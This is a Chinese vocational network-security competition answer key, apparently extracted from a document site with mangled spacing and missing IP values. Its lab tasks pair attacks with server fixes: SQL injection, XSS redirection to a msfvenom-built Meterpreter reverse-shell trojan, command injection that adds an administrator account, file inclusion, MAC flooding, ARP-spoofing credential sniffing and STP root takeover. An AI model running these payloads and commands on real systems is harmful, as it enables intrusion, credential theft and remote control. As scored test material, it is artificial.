




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
1、文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。任務1:SQL注入攻防(55分)1.Web訪問DCST中的WebServ2003服務器,進入login.php頁面,分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)頁面標題:LoginPage找到提交的變量名(3分)提供以下變量:name=usernmname=passwd2.對該任務題目1頁面注入點進行SQL注入滲透測試,使該Web站點可通過任意用戶名登錄,并將測試過程截圖;(5分)構造注入語句:1word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式
2、支持編輯,如有幫助歡迎下載支持。username:任意用戶名password:含:orX=X(X為任意值)(3分)同時包含截圖:1、通過任意用戶名登錄(截圖)2、登錄成功頁面(截圖)(2分)3.進入DCST中的WebServ2003服務器的C:AppServwww目錄,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并將修改后的PHP源程序截圖;(10分)2word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。(10分)包含語句:1、selectpasswordfr
3、omuserswhereusername=$username2、if($obj-password=$password)4.再次對該任務題目1頁面注入點進行滲透測試,驗證此次利用該注入點對該DCST中的WebServ2003服務器進行SQL注入滲透測試無效,并將驗證過程截圖;(5分)同時包含截圖:1、通過任意用戶名登錄(截圖)3word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。2、登陸后,頁面出現(xiàn)用戶名不存在提示;(截圖)(5分)5.Web繼續(xù)訪問DCST中的WebServ2003服務器,/-EmployeeInforma
4、tionQuery,分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)4word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。找到的源程序含有頁面標題:Query找到提交的變量名(3分)name=usernm6.對該任務題目5頁面注入點進行滲透測試,根據輸入“%”以及“_”的返回結果確定是注入點,并將測試過程截圖;(5分)(2分)5word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。輸入“%”,返回所有用戶信息(截圖)輸入“_”,返
5、回所有用戶信息(截圖)(3分)7.通過對該任務題目5頁面注入點進行SQL注入滲透測試,刪除DCST中的WebServ2003服務器的C:目錄下的1.txt文檔,并將注入代碼及測試過程截圖;(5分)構造注入語句:execdelc:1.txt-(5分)8.進入DCST中的WebServ2003服務器的C:AppServwww目錄,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入滲透測試,并將修改后的PHP源程序截圖;(10分)6word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎
6、下載支持。截圖:在服務器場景QueryCtrl.php源程序語句:$keyWord=$_REQUESTusernm之后加入:(10分)9.再次對該任務題目5頁面注入點進行滲透測試,驗證此次利用注入點對該WebServer進行SQL注入滲透測試無效,并將驗證過程截圖。(5分)通過:execdelc:1.txt再次進行SQL注入截圖;系統(tǒng)出現(xiàn)錯誤提示:BadKeyWord?。ń貓D)(5分)任務2:XSS和CSRF攻防(65分)7word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。1.Web訪問DCST中的WebServ2003
7、服務器,/-EmployeeMessageBoard,分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)含有頁面標題:MessageBoard找到提交的變量名:(3分)name=MessageUsernamename=message2.對該任務題目1頁面注入點進行XSS滲透測試,并進入/-EmployeeMessageBoard-DisplayMessage頁面,根據該頁面的顯示,確定是注入點,并將測試過程截圖;(5分)8word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。構造注入代碼:(2分)whi
8、le(1)alert(Hacker!);測試注入成功:(3分)彈出alert(Hacker!)括號中的消息;3.對該任務題目1頁面注入點進行滲透測試,使/-EmployeeMessageBoard-DisplayMessage頁面的訪問者執(zhí)行網站()中的木馬程序:,并將注入代碼及測試過程截圖;(5分)構造注入代碼:(2分)location.href=;測試過程:(3分)9word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。名稱:trojanhorse.exe發(fā)送者:4.通過IIS搭建網站(),并通過Kali生成木馬程序Tr
9、ojanHorse.exe,將該程序復制到網站()的WWW根目錄下,并將搭建該網站結果截圖;(5分)搭建IIS(1分)Internet信息服務:網站目錄下存放:trojanhorse.exe搭建DNS(1分)10word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。正向查找區(qū)域:主機(截圖)Zone:Org主機:hackerMetasploitFramework:TrojanHorse.exe生成(3分)rootbt:#Ifconfig(截圖)顯示KaliIP地址:截圖包含:rootbt:#msfvenompwindows/
10、meterpreter/reverse_tcpLHOST=LPORT=80fexeotrojanhorse.exe5.當/-EmployeeMessageBoard-DisplayMessage頁面的訪問者執(zhí)行網站()中的木馬程序TrojanHorse.exe以后,訪問者主機需要被Kali主機遠程控制,打開訪問者主機的CMD.exe命令行窗口,并將該操作過程截圖;(5分)11word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。MetasploitFramework:HackerReverseTcp連接客戶端(2分)root
11、bt:#msfconsolemsfuseexploit/multi/handlermsfexploit(handler)setPAYLOADwindows/meterpreter/reverse_tcpPAYLOAD=windows/meterpreter/reverse_tcpmsfexploit(handler)setLHOSTLHOST=msfexploit(handler)setLPORT80LPORT=80msfexploit(handler)exploit*Startedreversehandleron*Startingthepayloadhandler.(截圖中包含黃色部分)訪問
12、者主機需要被Kali主機遠程控制(3分)KaliMSF提示(截圖)包含如下信息KaliIP:訪問者主機IP:*Sendingstage(bytes)to*Meterpretersession1opened(-atmeterpreter12word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。Kali截圖包含打開訪問者主機的CMD.exe命令行窗口;6.進入DCST中的WebServ2003服務器的C:AppServwww目錄,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS滲透
13、測試,并將修改后的PHP源程序截圖;(10分)(10分)在服務器場景原insert.php程序語句$info=$_REQUESTmessage后加入:綠色部分,通過替換函數,通過其它字符(,(),等字符)替換字符“”均可得分;$info=str_replace(“”,”)”,$info);或$info=str_replace(“”,”,$info);或$info=str_replace(“”,”,$info);7.再次對該任務題目1頁面注入點進行滲透測試,驗證此次利用該注入點對該DCST中的WebServ2003服務器進行XSS滲透測試無效,并將驗證過程截圖;(5分)SQLServer企業(yè)管理
14、器中,Message表中info字段注入語句符號“”被替換為上一題替換后的字符;同時CommunicationMessage頁面顯示Content:注入語句符號“”被替換為上一題替換后的字符;(5分)8.Web訪問DCST中的WebServ2003服務器,/-ShoppingHall,分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)14word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。頁面標題為:ShoppingHall找到提交的變量名:(3分)goods=keyboard&quantity=1g
15、oods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=19.對該任務題目1頁面注入點進行滲透測試,使/-EmployeeMessageBoard-DisplayMessage頁面的訪問者向頁面ShoppingProcess.php提交參數goods=cpu&quantity=999999,查看/-PurchasedGoods.php頁面,并將注入代碼及測試過程截圖;(5分)構造注入代碼:(2分)document.location=
16、.X/ShoppingProcess.php?goods=cpu&quantity=999999;15word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。WebServerIP:測試過程:(3分)截圖:Goods:CPU數值大于或等于99999910.進入DCST中的WebServ2003服務器的C:AppServwww目錄,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF滲透測試,并將修改后的源程序截圖;(10分)截圖:服務器場景DisplayMessag
17、e.php程序語句:16word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。echo“Content:”.”$obj-info”.”替換為:echo“Content:”.strip_tags(”$obj-info”).”(10分)11.再次對該任務題目1頁面注入點進行滲透測試,驗證此次利用該注入點對該DCST中的WebServ2003服務器進行CSRF滲透測試無效,并將驗證過程截圖;(5分)(5分)得分點:直接顯示代碼信息,而不是將代碼執(zhí)行;(截圖)SQLServer企業(yè)管理器中,Message表中info字段注入語句含有
18、標記;同時CommunicationMessage頁面顯示Content:注入語句不含有標記;17word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。任務3:命令注入與文件包含攻防(50分)1.Web訪問DCST中的WebServ2003服務器,/-DisplayDirectory,分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)頁面標題:DisplayC:sDirectory找到提交的變量名:(3分)name=directory2.對該任務題目1頁面注入點進行滲透測試,使頁面DisplayDire
19、ctoryCtrl.php回顯C:Windows目錄內容的同時,對WebServer添加賬號“Hacker”,將該賬號加入管理員組,并將注入代碼及測試過程截圖;(5分)18word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。注入語句:(2分)WINDOWS|netuserHackerPssword/addWINDOWS|netlocalgroupadministratorsHacker/add測試成功:(3分)截圖:含有:命令成功完成。3.進入DCST中的WebServ2003服務器的C:AppServwww目錄,找到Di
20、splayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入滲透測試,并將修改后的源程序截圖;(10分)(10分)19word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。包含語句:$str=|if(strstr($directory,$str)=false)4.再次對該任務題目1頁面注入點進行滲透測試,驗證此次利用注入點對該DCST中的WebServ2003服務器進行命令注入滲透測試無效,并將驗證過程截圖;(5分)截圖1:利用注入點對該DCST中的WebServ20
21、03服務器進行命令注入滲透測試;含有本任務第2題的命令注入語句;WINDOWS|netuserHackerPssword/addWINDOWS|netlocalgroupadministratorsHacker/add截圖2:頁面出現(xiàn)非法輸入提示;含有本任務題目3修改后代碼中的錯誤提示信息;本案例提示信息為:illegalinput?。?分)20word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。5.Web訪問DCST中的WebServ2003服務器,/-DisplayUploadedsFileContent,分析該頁面源
22、程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)頁面標題:DisplayUploadsFileContent找到提交的變量名:(3分)name=filename6.對該任務題目5頁面注入點進行滲透測試,使頁面DisplayFileCtrl.php回顯DCST中的WebServ2003服務器訪問日志文件:AppServ/Apache2.2/logs/access.log的內容,并將注入代碼及測試過程截圖;(5分)構造注入代碼:(2分).AppServApache2.2logsaccess.log回顯DCST中的WebServ2003服務器訪問日志文件:顯示出AppServ/Apach
23、e2.2/logs/access.log的內容:(3分)21word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。InternetExplorer地址欄中須含有:DisplayFileCtrl.php?filename=7.進入DCST中的WebServ2003服務器的C:AppServwww目錄,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含滲透測試,并將修改后的源程序截圖;(10分)22word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已
24、重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。(10分)包含語句:$str=.if(strstr($directory,$str)=false)8.再次對該任務題目5頁面注入點進行滲透測試,驗證此次利用注入點對該DCST中的WebServ2003服務器進行文件包含滲透測試無效,并將驗證過程截圖。(5分)截圖1:利用注入點對該DCST中的WebServ2003服務器進行命令注入滲透測試;輸入框含有本任務題目6的注入代碼:23word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。.AppServApache2.2lo
25、gsaccess.log截圖2:頁面出現(xiàn)非法輸入提示;含有本任務題目7修改后代碼中的錯誤提示信息;本案例提示信息為:illegalinput?。?分)任務4:數據竊取防護:二層攻防(45分)1.將PC1、Kali所連接端口劃入與WAF同一VLAN(VLAN10),并將PC1、Kali分配與DCST服務器相同網段IP地址,使PC1、Kali、DCST中的WebServ2003服務器能夠在同一個網段(VLAN10)內相互Ping通。(2分)截圖:PC1、Kali、DCST同在VLAN10;(#showvlan)24word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,wo
26、rd格式支持編輯,如有幫助歡迎下載支持。VLAN10中包含的接口數=3;WebServerIP配置(與參數表中服務器場景的IP地址一致):PC1IP地址配置(與參數表中PC1的IP地址一致):PC3IP地址配置(與參數表中PC3的IP地址一致):25word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。三個終端之間能夠相互Ping通;在同一個窗口ping通除了本機外的2個IP地址;26word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。2.查看DCRS交
27、換機VLAN10的MAC地址表容量信息,并將DCRS交換機配置相關參數、查看命令、查看結果截圖。(3分)#showmac-address-tablecountvlan10DCRS地址表空間中有可用的空間;當前地址表記錄數少于地址表容量;MaxentiresTotal:16384CurrententiresTotal:該數值小于103.從Kali發(fā)起MACFlooding滲透測試,使DCRS交換機的MAC地址表溢出,使其在MAC地址表溢出的條件下,無法學習到PC1和DCST中的WebServ2003服務器的MAC地址表信息,查看DCRS交換機的MAC地址表信息,并將滲透測試過程截圖。(5分)27
28、word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。Kali#macof(2分)#showmac-address-tablecountvlan10當前地址表記錄數等于地址表容量;MaxentiresTotal:16384CurrententiresTotal:該數值=16384(3分)28word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。4.Kali打開wireshark,驗證在DCRS交換機MAC地址表溢出的條件下,可以監(jiān)聽到PC1訪問DCST中的
29、WebServ2003服務器的HTTP流量,并將該驗證過程截圖。(5分)PC1通過InternetExplorer訪問;(截圖)地址欄包含:服務器場景IP(匹配參數表服務器場景IP)/Kali打開wireshark,監(jiān)聽到PC1通過InternetExplorer訪問DCST服務器場景的HTTP流量;截圖:Source:PC1的IP地址(與參數表一致)Destination:服務器場景的IP地址(與參數表一致)Protocol:HTTP(5分)29word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。5.在DCRS交換機Ka
30、li所連接端口配置PortSecurity特性,阻止Kali發(fā)起MACFlooding滲透測試,驗證此時DCRS交換機MAC地址表能夠學習到PC1、DCST中的WebServ2003服務器的MAC地址,并將DCRS交換機相關配置信息以及驗證信息截圖。(8分)配置截圖包含:mac-address-learningcpu-control(2分)在VLAN10每個接口全部啟用如下:InterfaceEthernet1/0/Xswitchportport-security(2分)#clearmac-address-tabledynamic(2分)#showmac-address-tablecountv
31、lan10DCRS地址表空間中有可用的空間;當前地址表記錄數少于地址表容量;30word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。MaxentiresTotal:16384CurrententiresTotal:該數值小于10(2分)6.在DCRS交換機配置PortSecurity特性的條件下,Kali再次打開wireshark,監(jiān)聽PC1訪問DCST中的WebServ2003服務器流量,驗證此時Kali無法監(jiān)聽到PC1訪問DCST中的(WebServ2003服務器的HTTP流量,并將驗證過程截圖。7分)PC1通過Int
32、ernetExplorer訪問服務器場景;(截圖)地址欄包含:服務器場景IP(匹配參數表服務器場景IP)/Kali打開wireshark,監(jiān)聽不到PC1通過InternetExplorer訪問DCST的HTTP流量;(截圖)31word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。Filter:http顯示報文數:空任務5:數據竊取防護:ARP攻防(45分)1.在PC1訪問DCST中的WebServ2003服務器時,查看PC1和DCST中的WebServ2003服務器的ARP緩存信息,并將PC1和DCST中的WebServ2
33、003服務器的ARP緩存信息截圖。(5分)PC1、WebServ2003Ipconfig/all分別顯示PC1、WebServ2003的IP和MAC;PC1的IP和MAC:32word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。服務器場景的IP和MAC:PC1通過InternetExplorer訪問服務器場景;(截圖)地址欄包含:服務器場景IP(匹配參數表服務器場景IP)/PC1:ARP表項內容為WebServ2003的IP-WebServ2003的真實的MAC;WebServ2003:ARP表項內容為PC1的IP-PC1
34、的真實的MAC;33word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。2.在Kali對PC1進行ARPSpoofing滲透測試,使PC1無法訪問DCST中的WebServ2003服務器,PC1的ARP緩存為:DCST中的WebServ2003服務器IP-Kali的MAC地址,在PC1查看被Kali毒化后的ARP緩存信息,并將該信息截圖。(5分)Kali:#arpspooftPC1_IPWebServ2003_IP(過程截圖)(2分)PC1:ARP表項內容為WebServ2003的IP-Kali的MAC;KaliMAC:i
35、fconfig(截圖)34word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。(3分)3.在Kali對PC1和DCST中的WebServ2003服務器進行ARP中間人滲透測試,使Kali能夠使用wireshark監(jiān)聽到PC1向DCST中的WebServ2003服務器的LoginAuth.php頁面提交的登錄網站用戶名、密碼參數,并將該滲透測試過程截圖。(7分)Kali:#arpspooftPC1_IPWebServ2003_IP#arpspooftWebServ2003_IPPC1_IP#echo1/proc/sys/ne
36、t/ipv4/ip_forward(3分)PC1通過InternetExplorer訪問服務器場景;(截圖)地址欄包含:服務器場景IP(匹配參數表服務器場景IP)/success.php35word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。Kali打開wireshark,監(jiān)聽到PC1通過InternetExplorer訪問DCST服務器場景的HTTP流量;(截圖)截圖中包含PC1通過InternetExplorer訪問DCST服務器場景的用戶名、密碼;包含:usernm=XXX&passwd=XXX(4分)4.在DCRS
37、交換機上配置AccessManagement特性阻止Kali發(fā)起ARPSpoofing滲透測試,并將DCRS交換機該配置信息截圖。(5分)36word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。配置截圖包含:amenable(2分)只在連接Kali的接口配置:InterfaceEthernet1/0/Xamportammac-ip-poolMac(Kali)IP(Kali)(3分)5.在DCRS交換機上配置AccessManagement特性的條件下,再次在Kali對PC1和DCST中的WebServ2003服務器進行AR
38、PSpoofing滲透測試,此時DCRS交換機的AccessManagement特性能夠阻止Kali對PC1和DCST中的WebServ2003服務器進行ARPSpoofing滲透測試,再次查看PC1和DCST中的WebServ2003服務器的ARP緩存信息,并將該信息截圖。(8分)(4分)PC1:ARP表項內容為WebServ2003的IP-WebServ2003的真實的MAC;(4分)WebServ2003:ARP表項內容為37word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。PC1的IP-PC1的真實的MAC;6.
39、在DCRS交換機上刪除AccessManagement技術配置,通過IPDHCPSnoopingBind特性來阻止Kali發(fā)起ARPSpoofing滲透測試,并將DCRS交換機相關配置信息截圖。(7分)配置截圖包含:ipdhcpsnoopingenable(1分)ipdhcpsnoopingvlan10(1分)ipdhcpsnoopingbindingenable(1分)ipdhcpsnoopingbindinguserMac(Kali)addressIP(Kali)vlan10interfaceEthernet1/0/X(Kali連接的接口)(2分)在Kali連接的接口配置:38word格式
40、支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。InterfaceEthernet1/0/Xipdhcpsnoopingbindinguser-control(2分)7.在DCRS交換機上配置IPDHCPSnoopingBind特性的條件下,再次在Kali對PC1和DCST中的WebServ2003服務器進行ARPSpoofing滲透測試,此時DCRS交換機的IPDHCPSnoopingBind特性能夠阻止Kali對PC1和DCST中的WebServ2003服務器進行ARPSpoofing滲透測試,再次查看PC1和DCST中的We
41、bServ2003服務器的ARP緩存信息,并將該信息截圖。(8分)(4分)PC1:ARP表項內容為WebServ2003的IP-WebServ2003的真實的MAC;(4分)WebServ2003:ARP表項內容為PC1的IP-PC1的真實的MAC;39word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。任務6:數據竊取防護:生成樹攻防(40分)1.在DCRS交換機開啟生成樹協(xié)議,生成樹協(xié)議模式為STP,DCRS交換機優(yōu)先級為0,防止網絡出現(xiàn)物理環(huán)路,顯示DCRS交換機生成樹協(xié)議的狀態(tài),并將該信息截屏;(5分)STP配置:
42、(2分)配置截圖包含:spanning-treespanning-treemodestpspanning-treemst0priority0顯示DCRS交換機生成樹協(xié)議的狀態(tài):(3分)#showspanning-treeRootID:thisSwitch(必須)40word格式支持編輯,如有幫助歡迎下載支持。文檔從互聯(lián)網中收集,已重新修正排版,word格式支持編輯,如有幫助歡迎下載支持。2.在Kali向DCRS交換機發(fā)起TakeOverTheRootBridge滲透測試,使DCRS交換機認為Kali為RootBridge,顯示DCRS交換機生成樹協(xié)議的狀態(tài),并將該信息截屏;(5分)Kali:YersiniaG(截圖)ClaimingRoot
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024-2025學年高中生物第1單元第1章第2節(jié)植物體內的其他激素教案中圖版必修3
- 2024-2025學年高中政治第3單元思想方法與創(chuàng)新意識第8課唯物辯證法的發(fā)展觀第2框用發(fā)展的觀點看問題課堂訓練新人教版必修4
- 2025年中國定象輪行業(yè)市場發(fā)展前景及發(fā)展趨勢與投資戰(zhàn)略研究報告
- 6萬噸亞氨基二乙腈項目可行性研究報告申請報告
- 2025年超高壓液壓控制閥行業(yè)深度研究分析報告
- 活性炭鞋墊行業(yè)深度研究報告
- 生活垃圾處理可行性研究報告建議書
- 2024-2030年中國互聯(lián)網餐飲行業(yè)發(fā)展運行現(xiàn)狀及投資戰(zhàn)略規(guī)劃報告
- 2025年塑料圓柱形項目可行性研究報告
- 中國二層水牛皮汽車座墊項目投資可行性研究報告
- 珠海市第三人民醫(yī)院中醫(yī)智能臨床輔助診療系統(tǒng)建設方案
- 早產臨床診斷與治療指南
- 工程簽證單完整版
- 《義務教育數學課程標準(2022年版)》初中內容解讀
- 全院護理查房(食管裂孔疝)
- 川教版信息技術六年級下冊全冊教案【新教材】
- 2024-2025學年統(tǒng)編版語文九年級下冊第7課《溜索》任務驅動型教學設計
- (國賽)5G組網與運維賽項備考試題庫及答案
- 代寫文章合同模板
- 初中體育與健康 50米加速跑及途中跑 教案
- 自考00808商法押題及答案解析
評論
0/150
提交評論